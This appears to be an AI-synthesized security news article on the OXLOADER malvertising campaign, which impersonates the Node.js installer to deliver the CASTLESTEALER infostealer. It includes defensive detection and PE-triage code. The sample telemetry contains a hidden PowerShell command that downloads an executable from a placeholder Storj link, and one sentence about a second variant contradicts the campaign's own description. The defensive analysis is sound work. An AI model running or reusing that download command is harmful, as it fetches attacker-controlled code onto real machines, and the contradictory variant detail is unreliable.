VYPR research
Published Jun 22, 2026 · 1 source

OXLOADER Malware Delivered via Google Ads Impersonating Node.js Installer

Elastic Security Labs has uncovered OXLOADER, a novel loader distributed through Google Ads that impersonates the Node.js installer to deploy the CASTLESTEALER infostealer on Windows systems.

Elastic Security Labs has identified a new malware loader, tracked as OXLOADER, that is being distributed through malicious Google Ads impersonating the Node.js installer. The campaign, which targets Windows users in the United States, delivers the CASTLESTEALER infostealer after a single click on a sponsored search result. The attack exploits the common practice of trusting top search results when downloading software, using a fake landing page that closely mimics the official Node.js platform.

The infection chain begins when a user searches for the Node.js installer and clicks a sponsored ad. The victim is redirected through an intermediary domain to a malicious Windows batch script hosted on Storj, a legitimate cloud storage service. This abuse of a trusted service helps the attack bypass reputation-based filtering. The batch script then displays a convincing fake software installation wizard while silently downloading the next-stage executable using PowerShell and triggering a Windows User Account Control prompt to gain elevated system access.
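The chain described above has a recognizable shape in process telemetry: a batch file run by cmd.exe spawns PowerShell, PowerShell pulls a payload from a Storj-hosted URL, and shortly afterwards a process starts with high integrity from a user-writable directory. The following is an added detection example, not Elastic's code and not part of the original report; the event fields, the download-verb and Storj link patterns, the 300-second window and the sample events are all assumptions constructed for the example.

```python
"""
Added example (not Elastic's code): correlate process-creation telemetry to
flag the chain described above, a batch file launching PowerShell to fetch
a next stage from a Storj-hosted URL, followed by a UAC-elevated process
starting from a user-writable directory. The event fields, the Storj link
pattern and the sample events are assumptions constructed for this example.
"""
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcEvent:
    ts: float          # event time, seconds
    pid: int
    ppid: int
    image: str         # executable file name, lowercase
    path: str          # full image path, lowercase
    cmdline: str
    integrity: str     # "low" | "medium" | "high" (high = elevated through UAC)


# Assumed indicators: common PowerShell download idioms and a Storj link host.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b", re.I)
STORJ_URL_RE = re.compile(r"https?://[^\s'\"]*storj[^\s'\"]*", re.I)
USER_WRITABLE_RE = re.compile(r"\\(appdata\\local\\temp|downloads|temp)\\")


def detect_oxloader_chain(events, window_s=300):
    """Return one alert per batch -> PowerShell download -> elevated-process chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ps in events:
        if ps.image != "powershell.exe":
            continue
        url = STORJ_URL_RE.search(ps.cmdline)
        if not url or not DOWNLOAD_RE.search(ps.cmdline):
            continue
        parent = by_pid.get(ps.ppid)
        if parent is None or parent.image != "cmd.exe" or ".bat" not in parent.cmdline.lower():
            continue
        # Stage 3: an elevated process started from a user-writable path shortly after
        # the download. Do not key on ppid here: a UAC-elevated process is created by the
        # AppInfo service (a svchost.exe instance), not by the script that requested it.
        elevated = [c.pid for c in events
                    if c.integrity == "high"
                    and ps.ts <= c.ts <= ps.ts + window_s
                    and USER_WRITABLE_RE.search(c.path)]
        alerts.append({
            "severity": "high" if elevated else "medium",
            "batch_pid": parent.pid,
            "powershell_pid": ps.pid,
            "elevated_pids": elevated,
            "url": url.group(0),
        })
    return alerts


PS_PATH = r"c:\windows\system32\windowspowershell\v1.0\powershell.exe"
# Constructed telemetry: one malicious chain (pids 4100/4104/4210) and one benign build script.
SAMPLE_EVENTS = [
    ProcEvent(1000.0, 4100, 3000, "cmd.exe", r"c:\windows\system32\cmd.exe",
              r'cmd.exe /c "c:\users\dev\downloads\node-v22-setup.bat"', "medium"),
    ProcEvent(1002.0, 4104, 4100, "powershell.exe", PS_PATH,
              'powershell -w hidden -c "iwr https://link.storjshare.io/s/EXAMPLE/setup.exe'
              ' -OutFile $env:TEMP\\setup.exe"', "medium"),
    ProcEvent(1009.0, 4210, 900, "setup.exe", r"c:\users\dev\appdata\local\temp\setup.exe",
              r'"c:\users\dev\appdata\local\temp\setup.exe"', "high"),
    ProcEvent(2000.0, 5100, 3000, "cmd.exe", r"c:\windows\system32\cmd.exe",
              r'cmd.exe /c "c:\dev\build.bat"', "medium"),
    ProcEvent(2001.0, 5104, 5100, "powershell.exe", PS_PATH,
              'powershell -c "iwr https://nodejs.org/dist/v22.0.0/node-v22.0.0-x64.msi -OutFile node.msi"',
              "medium"),
]

if __name__ == "__main__":
    for alert in detect_oxloader_chain(SAMPLE_EVENTS):
        print(alert)
```

The benign build script downloads from nodejs.org and never reaches the Storj check, so only the malicious chain produces an alert; without the elevated follow-on process within the window the alert is downgraded to medium rather than dropped, since the download stage alone is already worth a ticket.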

OXLOADER is built with extensive evasion capabilities. Before executing its payload, it performs five separate checks to confirm it is not running inside a sandbox or virtual machine. These checks include requiring at least three CPU cores, at least 3 GB of physical RAM and a display refresh rate above 20 Hz, and refusing to run on systems located in a CIS region or configured for the Russian language. The loader also relies on layered obfuscation, hiding its malicious code inside the PE file's .reloc section and unpacking itself in memory using self-modifying decryption routines.
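A legitimate .reloc section is a chain of small base-relocation blocks (a page RVA, a block size, then 2-byte entries), so a .reloc that does not parse as such blocks, has near-8-bit entropy, or dominates the file is a useful static triage signal for the kind of payload hiding described above. The following is an added example, not Elastic's code and not OXLOADER itself; the minimal PE parser, the thresholds and the two constructed sample images are assumptions made for the example.

```python
"""
Added example (not Elastic's code or OXLOADER itself): static triage of a
PE file's .reloc section. Real relocation data is a chain of small blocks
(page RVA, block size, 2-byte entries) with modest entropy; a .reloc that
fails that walk, has near-8-bit entropy, dominates the file, or is marked
executable deserves a closer look. Thresholds and the sample PEs built
below are assumptions constructed for the example.
"""
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000


def shannon_entropy(blob):
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(data):
    """Minimal PE section-table reader (no dependency on pefile)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # signature(4) + COFF header(20) + optional header
    out = []
    for i in range(nsec):
        name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        out.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "vsize": vsize,
                    "vaddr": vaddr, "raw_size": raw_size, "raw_ptr": raw_ptr, "chars": chars})
    return out


def walks_as_reloc_blocks(blob):
    """True if blob parses as IMAGE_BASE_RELOCATION blocks up to trailing zero padding."""
    off, blocks = 0, 0
    while off + 8 <= len(blob):
        page_rva, size = struct.unpack_from("<II", blob, off)
        if page_rva == 0 and size == 0:       # file-alignment padding after the last block
            break
        if size < 8 or size % 4 or off + size > len(blob):
            return False
        off += size
        blocks += 1
    return blocks > 0


def triage_reloc(data, entropy_threshold=7.0, size_ratio=0.25):
    """Report findings for the .reloc section; thresholds are assumptions for this example."""
    for s in parse_sections(data):
        if s["name"] != ".reloc":
            continue
        blob = data[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        ent = shannon_entropy(blob[:s["vsize"]] if s["vsize"] else blob)
        findings = []
        if s["chars"] & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE):
            findings.append("executable")
        if ent > entropy_threshold:
            findings.append("high_entropy")
        if s["vsize"] / len(data) > size_ratio:
            findings.append("oversized")
        if not walks_as_reloc_blocks(blob):
            findings.append("malformed_blocks")
        return {"found": True, "entropy": round(ent, 2), "findings": findings}
    return {"found": False, "entropy": 0.0, "findings": []}


def build_pe(sections, file_align=0x200, opt_size=0xE0):
    """Constructed minimal PE64 image: sections is a list of (name, characteristics, raw bytes)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    raw_ptr = -(-(len(dos) + len(coff) + opt_size + 40 * len(sections)) // file_align) * file_align
    first_raw, table, body, va = raw_ptr, b"", b"", 0x1000
    for name, chars, raw in sections:
        padded = raw + b"\0" * (-len(raw) % file_align)
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), va, len(padded), raw_ptr,
                             0, 0, 0, 0, chars)
        body += padded
        raw_ptr += len(padded)
        va += -(-len(raw) // 0x1000) * 0x1000
    header = dos + coff + b"\0" * opt_size + table
    return header + b"\0" * (first_raw - len(header)) + body


CODE_FLAGS = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_FLAGS = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ
TEXT = bytes([0x48, 0x89, 0x5C, 0x24, 0x08, 0xC3]) * 40            # constructed code-like filler
VALID_RELOC = struct.pack("<II", 0x1000, 12) + struct.pack("<HH", 0xA010, 0)  # one DIR64 entry
BENIGN_PE = build_pe([(".text", CODE_FLAGS, TEXT), (".reloc", DATA_FLAGS, VALID_RELOC)])
# Constructed stand-in for an encrypted blob: a byte permutation with entropy 8.0, no block layout.
PACKED_BLOB = bytes(((i * 197 + 13) & 0xFF) for i in range(4096))
SUSPICIOUS_PE = build_pe([(".text", CODE_FLAGS, TEXT), (".reloc", DATA_FLAGS, PACKED_BLOB)])

if __name__ == "__main__":
    print("benign    ", triage_reloc(BENIGN_PE))
    print("suspicious", triage_reloc(SUSPICIOUS_PE))
```

The block walk is the most discriminating of the four checks: packers can keep a section small and can pad entropy down, but a section that is declared as relocations while its contents do not chain as relocation blocks has no legitimate reason to exist.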

The final payload, CASTLESTEALER, is a .NET-based infostealer delivered entirely in memory using the open-source shellcode generator DonutLoader, leaving almost no trace on disk. The malware is capable of harvesting sensitive data from infected systems, including credentials, browser data, and other valuable information. Elastic Security Labs confirmed the campaign was actively targeting one of their own customers.

The malicious advertiser account was registered under a verified name linked to Ukraine. The last appearance of the ad was on April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns. A second variant of OXLOADER was discovered on May 13, 2026, masquerading as a Node.js installer binary rather than API Monitor, with the same underlying loader mechanism.

Security teams are advised to treat sponsored search results for developer tools with extra scrutiny, ensure endpoint behavioral detection is active rather than just set to monitor mode, and always verify software downloads directly against official vendor websites. The campaign highlights the ongoing threat of malvertising and the need for vigilance when downloading software from search engine results.

Synthesized by Vypr AI